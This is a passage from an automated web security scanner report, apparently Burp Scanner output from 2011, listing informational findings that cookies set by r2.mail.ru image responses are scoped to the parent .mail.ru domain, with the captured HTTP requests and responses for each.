The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526059.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 2876
Connection: keep-alive
Set-Cookie: p=8uAGAEipQQAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F....
...[SNIP]...
16.51. http://r2.mail.ru/b12526060.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526060.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526060.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:16 GMT
Content-Type: image/jpeg
Content-Length: 3123
Connection: keep-alive
Set-Cookie: p=V+YGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:16 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:16 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...
16.52. http://r2.mail.ru/b12526061.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526061.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526061.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3005
Connection: keep-alive
Set-Cookie: p=SPYGAEidmwAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.4..
...[SNIP]...
16.53. http://r2.mail.ru/b12526062.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526062.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526062.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 3109
Connection: keep-alive
Set-Cookie: p=NOIGAEqT7AAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.7..
...[SNIP]...
16.54. http://r2.mail.ru/b12526063.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526063.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526063.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:21 GMT
Content-Type: image/jpeg
Content-Length: 2846
Connection: keep-alive
Set-Cookie: p=S+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:21 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:21 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...
16.55. http://r2.mail.ru/b12526064.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526064.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526064.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/jpeg
Content-Length: 2433
Connection: keep-alive
Set-Cookie: p=JRMHAEzBGQAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....d.d......Ducky.......P......Adobe.d.....................................................        

       ......................    ..    .    ........................................................F.6..
...[SNIP]...
16.56. http://r2.mail.ru/b12526065.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526065.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526065.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:22 GMT
Content-Type: image/gif
Content-Length: 119
Connection: keep-alive
Set-Cookie: p=uuYGAEiT0QAA; expires=Wed, 24-Apr-13 14:21:22 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:22 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a
.2.....F..........!.......,....
.2...H.....\.r.J...J.y.8.............-.....T...x..n..)kL.3..>;.P.t.Q..-f#.....;
16.57. http://r2.mail.ru/b12526191.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526191.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526191.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 535
Connection: keep-alive
Set-Cookie: p=rPYGAEqlaAAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........f.=p.2h.......8nz..`~.b.....4[....2Z....Ce....Km..T.Il......e'R~Lm....c...Bt...$N{...... Ix..d......8_..*aLo....Hl..7m....5k........../fa.]|..3h=c....,U..1h.......Ar.........Qr.!L|.2iG
...[SNIP]...
16.58. http://r2.mail.ru/b12526192.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526192.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526192.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:25 GMT
Content-Type: image/gif
Content-Length: 165
Connection: keep-alive
Set-Cookie: p=vaYGAFbDNQAA; expires=Wed, 24-Apr-13 14:21:25 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:25 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.......`t.@|.=|.Qx.E|.=.L|.9..D~.G.@.................................................................!..Created with GIMP.,........... .@.p...4....@C.5.C..;
16.59. http://r2.mail.ru/b12526193.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526193.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526193.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 636
Connection: keep-alive
Set-Cookie: p=lPQGAFSf2AAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........(......]..':.7T.../................................................#H.#H...................e.....j........cv....0K.........................l...............:@..................Wc.[s.....
...[SNIP]...
16.60. http://r2.mail.ru/b12526194.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526194.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526194.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:26 GMT
Content-Type: image/gif
Content-Length: 93
Connection: keep-alive
Set-Cookie: p=kYsGAFT5qgAA; expires=Wed, 24-Apr-13 14:21:26 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:26 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a.........Us.....*..!.......,................#..."...jJ......&....X
....+X..u....
.DC..;
16.61. http://r2.mail.ru/b12526208.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526208.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526208.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 132
Connection: keep-alive
Set-Cookie: p=cuMGAEjl4gAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a/..................!.......,..../.....U.....c.......(.........j..[...
........H..p...7.)e../.B1M....4"5\...V...2`<8.........;
16.62. http://r2.mail.ru/b12526210.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12526210.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12526210.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 135
Connection: keep-alive
Set-Cookie: p=6usGAErxkwAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a................;.;............!.......,..........L(...%.X.......\$..hv...B@z........A....H.t.)...-P.d*6..@e2....J.RN...B...ht..;
16.63. http://r2.mail.ru/b12527647.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12527647.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12527647.gif HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:14 GMT
Content-Type: image/gif
Content-Length: 131
Connection: keep-alive
Set-Cookie: p=A+wGAEqNqQAA; expires=Wed, 24-Apr-13 14:21:14 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:14 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

GIF89a........P.....D................!.......,..........H....$.H.$B..k..UQ...\.(....9|sfF...7..0J.d..!..Q.09b&.0$......G.R...x.H..;
16.64. http://r2.mail.ru/b12529050.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12529050.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12529050.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:27 GMT
Content-Type: image/jpeg
Content-Length: 3351
Connection: keep-alive
Set-Cookie: p=eucGAEvDVAAA; expires=Wed, 24-Apr-13 14:21:27 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:27 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.................................
...[SNIP]...
16.65. http://r2.mail.ru/b12530142.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530142.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530142.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoBAAAJIgMAAQAC

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:28 GMT
Content-Type: image/jpeg
Content-Length: 2303
Connection: keep-alive
Set-Cookie: p=qBoHAE3xEgAA; expires=Wed, 24-Apr-13 14:21:28 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:28 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.....H.H.....C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
16.66. http://r2.mail.ru/b12530159.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12530159.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12530159.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:21:34 GMT
Content-Type: image/jpeg
Content-Length: 2119
Connection: keep-alive
Set-Cookie: p=qPsGAFqt5gAA; expires=Wed, 24-Apr-13 14:21:34 GMT; path=/; domain=.mail.ru
Expires: Mon, 02 May 2011 14:21:34 GMT
Cache-Control: max-age=604800
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSAo PSDo OUR BUS UNI NAV STA INT"

......JFIF.............C......................
.....
...
.................................C.......    ..    ..........................................................<.<.."..............................
...[SNIP]...
16.67. http://r2.mail.ru/b12531249.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r2.mail.ru
Path:   /b12531249.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b12531249.jpg HTTP/1.1
Host: r2.mail.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FTID=2jmTRp3gv_ms:1303423661:1301840:aHR0cDovL3d3dy5tYXJrZXRnaWQuY29tLw:aHR0cDovL2J1cnAvc2hvdy8xNA:; Mpopl=357307690; mrcu=22F24DB5832F1F2AA51BF3D6C1AD; b=8DoEACDL8gAAdDQMfV4MAQAIEwAI

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
